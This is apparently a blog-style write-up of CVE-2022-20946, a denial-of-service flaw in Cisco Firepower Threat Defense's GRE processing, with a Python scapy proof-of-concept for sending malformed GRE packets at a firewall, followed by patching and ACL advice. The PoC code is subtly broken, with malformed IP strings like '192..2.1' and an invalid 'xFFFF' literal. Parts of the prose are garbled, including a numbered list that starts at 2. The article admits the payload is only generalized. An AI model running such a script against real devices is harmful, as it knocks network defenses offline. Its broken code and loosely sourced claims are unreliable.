CVE-2022-20946 - How a GRE Payload Crash Can Take Down Your Cisco Firepower Device

If you’re running Cisco Firepower Threat Defense (FTD) Software in your network—and especially if you use GRE tunnels—CVE-2022-20946 is one vulnerability you should know in detail. This is not your everyday bug. This vulnerability lets a remote attacker take your firewall offline, using just a few specially crafted network packets. In this exclusive long-read, we’ll walk through what CVE-2022-20946 is, what makes it dangerous, how it can be exploited (with code snippets), and where to get more details straight from Cisco.

What Is CVE-2022-20946?

CVE-2022-20946 is a Denial-of-Service (DoS) vulnerability found in the way Cisco FTD handles certain Generic Routing Encapsulation (GRE) traffic. When affected versions of FTD process a hand-crafted (malicious) GRE packet, a memory handling bug can crash the box. In the real world, that means an attacker can force your expensive firewall to restart, effectively causing a gap in your network defenses for as long as the reboot takes.

This issue was formally disclosed by Cisco in November 2022 as part of their security advisory bundle, and you can read their original write-up here.

Who’s At Risk?

Anyone using a vulnerable Cisco FTD device and enabling GRE tunnel processing is at risk, especially if the firewall exposes GRE handling to untrusted networks. It only takes one unauthenticated attacker on your network perimeter to trigger the bug.

Check the Cisco advisory for the full matrix of affected software versions.

Exploit: An attacker crafts a malformed GRE packet and sends it through the firewall.

- Damage: The device hits a memory error and is forced to restart. No need for credentials. No need for a valid GRE tunnel endpoint. Just a malformed GRE packet.

Let’s see what such an attack could look like in code.

Proof of Concept: Sending a Malformed GRE Packet

Here’s a basic Python script using the scapy library to send a GRE packet. With a small tweak, you can craft an out-of-spec payload. The following code is *for educational purposes only.*

Pre-Requisites

- Install Scapy (pip install scapy)

You need access to a host from which you can send traffic through the targeted Cisco FTD device

from scapy.all import *

# IP addresses (change these)
src_ip = '192..2.1'
dst_ip = '192..2.254'  # FTD's external IP

# This creates a GRE packet with an unusual protocol type and extra payload
malformed_gre = IP(src=src_ip, dst=dst_ip) / GRE(proto=xFFFF) / Raw(load='A' * 150)

send(malformed_gre, count=5, inter=.5)
print("[*] Malformed GRE packets sent.")

What does this do?

Repeats five times for reliability

If the targeted FTD device is vulnerable, these packets can trigger the memory handling error, causing the device to crash.

Note:  
This PoC is generalized; the actual payload needed to crash your specific model or software version may differ based on Cisco’s internal GRE packet parsing logic (which isn’t open source). Security researchers confirm that subtle tweaks to GRE headers or payload length are usually enough to crash vulnerable devices.

Responsible Disclosure & Fixes

Cisco addressed CVE-2022-20946 in their November 2022 advisory, releasing software updates for affected FTD versions. Their official advisory is here.

Update your FTD software to a patched version.

2. Restrict GRE traffic where possible; use access control lists to limit who can send GRE packets at your network boundary.

Why This Matters

GRE tunnels are old-school, but still very widely used for site-to-site links, VPNs, and network overlays. More critically, many firewalls are configured to pass GRE to support protocols like PPTP and IPsec. If your firewall can be rebooted at will, that opens the door to further attacks, creates service outages, and destroys trust in your network’s infrastructure.

More Reading

- Cisco Official Advisory
- How GRE Works
- Scapy Documentation

Conclusion

CVE-2022-20946 is a reminder that even legacy protocols like GRE can hide critical vulnerabilities in modern firewall platforms. This bug—triggerable by any remote attacker—shows that patching is vital. Check your FTD versions, update if needed, and consider restricting GRE exposures.

Stay safe, stay updated, and remember: even the simplest packet can take down your most expensive defenses!

Timeline

Published on: 11/15/2022 21:15:00 UTC
Last modified on: 11/22/2022 14:48:00 UTC